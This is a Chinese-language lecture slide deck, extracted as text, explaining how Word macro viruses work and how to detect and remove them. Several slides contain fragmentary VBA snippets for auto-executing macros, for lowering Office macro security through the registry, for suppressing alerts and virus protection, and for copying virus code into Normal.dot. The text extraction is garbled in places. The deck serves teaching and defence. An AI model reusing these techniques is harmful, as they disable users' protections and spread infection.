宏病毒原理及实现PPT学习课件.ppt

,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,2,*,宏病毒的原理及实现,1,宏与,Office,Office,宏与,VBA,word,宏病毒原理,宏病毒的攻防,2,4/29/2025,宏（,macro),，,就是软件设计者为了在使用软件工作时，避免一再的重复相同的动作而设计出来的一种工具。它利用简单的语法，把常用的动作写成宏，当再工作时，就可以直接利用事先写好的宏自动运行，去完成某项特定的任务，而不必再重复相同的动作。,什么是,“,宏,”,？,Microsoft Office,、,wps,等办公软件 魔兽世界、剑网等游戏,哪里用到,“,宏,”,？,Office,宏的定义：,Microsoft Word,中对宏定义为：“宏就是能组织到一起作为一独立的命令使用的一系列,word,命令，它能使日常工作变得更容易”,3,4/29/2025,宏语言,宏语言即,VISUAL BASIC FOR APPLICATION,，简称,VBA,。,VBA,可以,访问许多操作系统函数,并支持文档打开时,自动执行宏,这使得用这种语言写计算机病毒成为可能,4,4/29/2025,Office,各版本及其宏语言,年份,Office,版本,宏语言,1987,Excel4.0,formula,1991,Excel5.0,VBA3,1993,Word6.0,WordBasic,1997,Office97applications,VBA5,1999,Office2000(WORD10),VBA6,2001,OfficeXP,VBA6.2,2003,Office2003(WORD11),VBA6.3,2006,Office2007(WORD12),VbA6.5,5,4/29/2025,6,Office,自带,Visual Basic,编辑器,注,:,1,、调用,VB,编辑器的快捷方式：,Alt+F11,2,、查看宏的快捷键：,Alt+F8,office2007,查看宏代码可以点击：,视图,宏,编辑,4/29/2025,VBA,简介,直到,90,年代早期,使应用程序自动化还是充满挑战性的领域。对每个需要自动化的应用程序，人们不得不学习一种不同的自动化语言。例如,:,用,EXCEL,的宏语言来使,EXCEL,自动化，使用,WORD BASIC,使,WORD,自动化等等。,微软开发出来的应用程序共享一种通用的自动化语言,-Visual Basic For Application(VBA),，实际上,VBA,是寄生于,VB,应用程序的版本。,VB,是设计用于创建标准的应用程序,而,VBA,是使已有的应用程序,(EXCEL,等,),自动化。,7,4/29/2025,word,创建宏,Word,提供了两种创建宏的方法：宏录制器和,Visual Basic,编辑器。宏录制器可帮助用户开始创建宏。,Word,在,VBA,编程语言中把宏录制为一系列的,Word,命令。可在,Visual Basic,编辑器中打开已录制的宏，修改其中的指令。也可用,Visual Basic,编辑器创建包括,Visual Basic,指令的非常灵活和强有力的宏，这些指令无法采用录制的方式。,8,4/29/2025,基于,word,的,VBA,编程,Sub AutoOpen(),定义函数名，,AutoXXX,为自动宏,While True,恶意代码，死循环,Msgbox”Hello world”,调用对话框显示消息,Wend,End Sub,函数到此结束,9,4/29/2025,基于,word,的,VBA,编程,Sub AutoOpen(),Command.Caption=Shell C:Program FilesInternet ExplorerIEXPLORE.EXE,vbNormalFocus,For i=1 To 10,Documents.Add,新添加一个,word,文档,Next i,End Sub,Word,应用的层次,Documents(,所有的文档,),Document(,一个文档,),Templates(,所有模板,),Windows(,所有窗口,),Selection,Style,Range,调用操作系统,Shell,函数,打开已安装的应用程序,10,4/29/2025,Office,有了宏，宏在,office,中的什么位置？,11,4/29/2025,为了方便人们使用宏以及宏文件的传递使用，,Word,定义出一种文件格式，将文档以及该文档所需要的宏合在一起放在后缀为,.dot,的文件之中。,正因为这种是宏也是资料的文档格式，便产生了宏感染的可能性。,但是，,Normal.dot,上不能用来存储数据，每次修改后都需另外保存,。,有没有一种文档格式，既可以存储宏，又可以用来存储数据？,12,4/29/2025,一、模板文件格式：,.dot,文档：模板文档，新文档继承模板的属性（宏、菜单、格式等）,。,Normal.dot,文件：全局模板，在建立整个文档中所起的作用是作为一个基类，是新建文档默认的模板。,二、数据文件格式,.doc,一种可以存贮宏的普通文档；,.docx,一种不包含宏的普通文档；,.docm,一种包含宏或启用了宏的文档；,.dotx,一种不包含宏的模板；,.dotm,一种包含宏或启用了宏的模板。,13,4/29/2025,宏就在,office,文档里,用普通文档即可传播宏文件,写代码简单，传播更简单，那么，我们可不可以做点别的事？,14,4/29/2025,其实宏病毒的出现并非出乎人们的意料，早在80年代后期就有专家预言过。那时，有些学生就用某些应用程序的宏语言编写病毒。然而，宏病毒与普通病毒不同，它不感染.EXE或.COM文件，而只感染文档文件。宏病毒就像自然界中令人恐惧的龙卷风，对人们正常使用计算机进行学习和工作带来了不可估量的影响，同时也造成了社会财富的巨大浪费。,15,4/29/2025,1.Concept,宏病毒,世界上的第一个宏病毒,Concept,可以感染,Windows,和苹果机上的,Microsoft Word,文档。这个病毒是用,Microsoft Word 6.0,中的宏语言编写的，但它也能感染其他,Word,版本创建的文档。看起来编写,Concept,宏病毒是为了证明确实可以用宏编程语言编写病毒。因此，,Concept,宏病毒只是显示一个对话框，宣示它的存在，并不故意破坏磁盘上的任何文件。,16,4/29/2025,2,Nuclear,宏病毒,这是一个对操作系统文件和打印输出有破坏功能的宏病毒。这个宏病毒中包含以下病毒宏：,AutoExec,AutoOpen,DropSuriv,FileExit,FilePrint,FilePrint,DefaultFile,SaveAs,这些宏是只执行（,Execute-only,）宏,Nuclear,宏病毒造成的破坏现象为：,（,1,）打开一个染毒文档井打印的时候，它会在您打印的最后一段加上“,STOPALLFRENCHNUCLEARTESTING,INTHEPACIFIC,！”，这个现象是在每分钟的,55,秒,60,秒之间操作打印时发生。,（,2,）如果在每天,17:00,18:00,之间打开一个染毒文档，,Nuclear,病毒会将,PH33R,病毒传染到计算机上，这是个,驻留型病毒。,（,3,）在每年的,4,月,5,日，该病毒会将计算机上,IO.SYS,和,MSDOS.SYS,文件清零，并且删除,C,盘根目录上的,COMMAND.COM,文件。一旦病毒发作，,MSDOS,就不可能被引导，计算机将陷入瘫痪。,17,4/29/2025,3,台湾一号病毒,台湾一号病毒会在每月的,13,日影响您正常使用,Word,文档和编辑器。它包含以下病毒宏：,AutoClose,、,AutoNew,、,AutoOpen,这些宏是可被编辑宏。在病毒宏中含有如下的语句：,IfDay(Now()=13Then.,这条语句与,13,日有关。台湾一号病毒造成的危害是：在每月,13,日，若用户使用,Word,打开一个带毒的文档（模板）时，病毒会被激发。激发时的现象是：在屏幕正中央弹出一个对话框，该对话框提示用户做一个心算题，如做错，它将会无限制地打开文件，直至,Word,内存不够，,Word,出错为止；如心算题做对，会提示用户“什么是巨集病毒（宏病毒）？”，回答“我就是巨集病毒”，再提示用户：“如何预防巨集病毒？”，回答是“不要看我”。,18,2.1,宏病毒简介,什么是宏病毒？,宏病毒,是一种寄存在文档或模板的宏中的计算机病毒。一旦,打开这样的文档,，其中的,宏自动被执行,，于是宏病毒就会被,激活,，转移到计算机上，并,驻留在,Normal,模板,上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会,转移,到他的计算机上。,19,4/29/2025,宏病毒的特点,（,1,）宏病毒会感染,.DOC,文档和,.DOT,模版文件。,（,2,）宏病毒的传染通常是,WORD,在打开一个带宏病毒的文档或模版时，激活宏病毒。,（,3,）多数宏病毒包含,AutoOpen,、,AutoClose,、,AutoNew,和,AutoExit,等自动宏，通过这些自动宏病毒取得文档,(,模版,),操作权。,（,4,）宏病毒中总是含有对文档读写操作的宏命令。,（,5,）病毒原理简单，制作比较方便。,（,6,）传播速度相对较快。,20,4/29/2025,WORD,宏病毒的生命周期,21,1,某个宏病毒对文档取得控制权,2,该病毒将自身复制到通用模板,3,通用模板在启动时自动调用,4/29/2025,编程语言：,VBA,、,WordBasic,等,运行环境：,VBE,Word,宏病毒的感染过程,22,4/29/2025,宏病毒原理大揭秘,23,4/29/2025,1,、降低宏安全级别,以,office2003,版为例,If Application.Version “11.0”Then,判断,office,版本,strFullname=ThisWorkbook.FullName,取得当前工作薄的全名,strVBS=Replace(UCase(strFullname),.XLS,.vbs),temp,文件,VBS,的文件名,Set WSH=CreateObject(“Wscript.Shell”),创建,Wscript,对象,Err.ClearOn Error Resume Next,出错不提示，继续,regStr=,24,4/29/2025,HKEY_CURRENT_USERSoftwareMicrosoftOffice11.0,Word,SecurityLevel“,注册表中,Excel vba,安全级别位置,ret=WSH.RegRead(regStr),读取当前安全级别,If Err.Number 0 Then,判断读取是否成功,vbOKOnly+vbCritical,Keanjeason Exit SubElse,如果当前,Excel VBA,安全级别不为,“,低,”,则设置为,“,低,”,值,1-4,分别对应：低，中，高，非常高,If Val(ret)1 Then ret=WSH.RegWrite(regStr,1,REG_DWORD)End If,25,4/29/2025,1,、用户使用,Word,执行打开文档、保存文档、打印文档和关闭文档等操作时，,Word,会查找指定的标准宏：,例,1,：,关闭文档之前查找,“,FileSave,”,宏，如果存在，首先执行这个宏,例,2,：打印文档之前首先查找,“,FilePrint,”,宏，如果存在则执行这个宏,2,、,Word,中另外还有一些以,“,Auto,”,开始的宏（自动宏），如,“,AutoOpen,”,、,“,AutoClose,”,等，如果建立了这些宏，打开,/,关闭文档的时候将自动执行这些宏，这些宏一般是全局宏，对任何,Word,文档都有效。,病毒触发要隐含在正常的操作中，这些自动执行的宏然是最好的宿主。,2,、文档的控制权获取,26,4/29/2025,宏病毒常用到的宏如下表所示,类别,宏 名,运行条件,自动宏,AutoExec,启动,Word,或加载全局模板时,AutoNew,每次创建新文档时,AutoOpen,每次打开已存在的文档时,AutoClose,在关闭文档时,AutoExit,在退出,Word,或卸载全局模板时,标准宏,FileSave,保存文件,FileSaveAs,改名另存为文件,FilePrint,打印文件,FileOpen,打开文件,27,4/29/2025,高明的病毒编写者其自我保护将做得非常好，可以使,word,的一些工具栏失效，例如将工具菜单中的宏选项屏蔽，也可以修改注册表达到很好的隐藏效果。,常用代码示例：,On Error Resume Next,如果发生错误，不弹出出错窗口，继续执行下面语句,Application.DisplayAlert=wdAlertsNoe,不弹出警告窗口,Application.EnableCancelKey=wdCancelDisabled,不允许通过,ESC,键结束正在运行的宏,Application.DisplayStatusBar=False,不显示状态栏，避免显示宏的运行状态,Application.ScreenUpdating=False,不让刷新屏幕，避免病毒运行引起刷新速度变慢,Option.VirusProtection=False,关闭病毒保护功能，运行前如果包含宏，不提示,Option.SaveNormalPrompt=False,如果公用模板被修改，不给用户提示窗口而直接保存,3,、宏病毒的自我隐藏,28,4/29/2025,1,、,Word,宏病毒一般都首先隐藏在一个指定的,Word,文档中，一旦打开了这个,Word,文档，宏病毒就被执行，宏病毒要做的第一件事情就是将自己拷贝到全局宏的区域，使得所有打开的文档都可使用这个宏。,2,、当,Word,退出的时候，全局宏将被存储在某个全局的模板文档,(.dot,文件,),中，这个文件的名字通常是,“,Normal.dot,”,，即,Normal,模板。,3,、如果全局宏模板被感染，则,Word,再启动的时候将自动载入宏病毒并且自动执行。,4,、传播与感染,29,4/29/2025,1,）得到正在操作的文档代码对象和公用模板的代码对象,。,Ourcode=ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1,100),Set Host=NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument=NormalTemplate Then,Set Host=ActiveDocument.VBProject.VBComponents(1).CodeModule,End If,2),检查模板是否已经感染病毒，如果没有，则复制宏病毒代码到模板，并且修改函数名。,With host,If.Lines(1,1)moonlight Then,.DeleteLines 1,.CountOfLines,.InsertLines 3,Sub Document_Close(),If ThisDocument=NormalTemplate Then,.RbeplaceLine 3,Sub Document_Open(),ActiveDocument.SaveAs ActiveDocument.FullName,End If End If,End With,30,4/29/2025,宏病毒预防,31,4/29/2025,宏病毒离不开可供其运行的系统软件,(WORD,，,EXCEL,等,OFFICE,软件,),，所以宏病毒的检测其实非常容易。只要留意一下常用的,OFFICE,系统软件是不是出现了一些不正常的现象，就能大概知道计算机是不是染上了宏病毒。,如何及时发现宏病毒？,32,4/29/2025,（,1,）全局模板中出现宏。,（,2,）无故出现存盘操作。,（,3,）,OFFICE,功能混乱，无法使用。,（,4,）,OFFICE,菜单命令消失。,（,5,）,OFFICE,文档的内容发生变化。,（,6,）尝试保存文档时，只允许将文档保存为文档模版的格式。,（,7,）文档图标的外形类似模板而非文档图标。,Office,不正常现象集锦,33,4/29/2025,感染了宏病毒后，同样可以用防治计算机病毒的软件来查杀，亦可采用以下方法进行手工处理：,1,、通过删除宏命令的形式删除宏病毒。,2,、通过复制粘贴清除宏病毒代码方式清除宏病毒。,3,、通过删除,NORMAL.DOT,来除掉,Word,宏病毒。,4,、通过格式转换清除,Word,宏病毒。,5,、通过高版本的,Word,发现病毒宏。,6,、为防万一，在打开怀疑感染了宏病毒的文档时按住,SHIFT,键，这样可以避免宏自动运行，如果有宏病毒，则不会加载宏。,宏病毒的清除,34,4/29/2025,日常办公中,如何去避免宏病毒？,35,4/29/2025,1,、初级防护,设置宏安全等级,36,针对,Office 2007,Office,word,选项,信任中心,宏设置,为了防止利用,“,VBA,”,语言编制专门破坏电脑系统的病毒程序，,Office,自带了,“,宏,”,检测功能。设置宏的安全级别较高时，打开带有,“,宏,”,的文档时，会提示用户注意，并让用户自行选择是否启用,“,宏,”,。,4/29/2025,（,1,）,根据,AUTO,宏的自动执行的特点，在打开,office,文档时，可按住,shift,键，来避免自动宏的运行,。,（,2,）当怀疑系统带有宏病毒时，首先应检查是否存在可疑的宏，也就是一些用户没有编制过、也不是,OFFICE,默认提供而出现的宏，如一些稀奇古怪名字的宏、,AutoXXX,命名的自动宏，可直接删除。具体做法是，选择,“,视图,”,“,宏,”,“,Visual Basic,编辑器,”,，删除各宏代码模块即可。,（,3,）针对宏病毒感染,NORMAL,模版的特点，用户在新安装了,OFFICE,软件后，可打开一个新文档，将,OFFICE,的工作环境按照自己的使用习惯进行设置，并将需要使用的宏一次编制好，做完后保存新文档。这时生成的,NORMAL,模版绝对没有宏病毒，可将其备份起来，亦可将其权限设为,“,只读,”,。在遇到有宏病毒感染时，用备份的,NORMAL,模版覆盖当前的,NORMAL,模版，可以起到消除宏病毒的作用。,2,、终极防护,37,4/29/2025,（,4,）当使用外来可能有宏病毒的,WORD,文档时，如果没有保留原来文档排版格式的必要，可先使用,WINDOWS,自带的写字版来打开，将其转换为写字版格式的文件保存后，再用,WORD,调用。因为写字版不调用、不记录、不保存任何宏，文档经此转换，所有附带其上的宏,(,包括宏病毒,),都将丢失。,（,5,）最好把,C,盘中的,AutoExec.bat,和,Config.sys,文件设为“只读”,把自动执行宏功能禁止,让宏病毒无法被激活。在,Word,中,选择“工具选项”,进入“常规”标签,选取“宏病毒保护”,这样,Word,就有了防止自动宏执行的功能。当然,我们也可以用下面的命令行来使自动宏无效,:Winword.exe/m(,同按住,Shift,键作用,),同时,选择“工具宏安全性”,将安全级设置为最高,并且取消“可靠来源”中的“信任所有安装的加载项和模版”,这让我们在预防宏病毒时更加有效。,38,4/29/2025,39,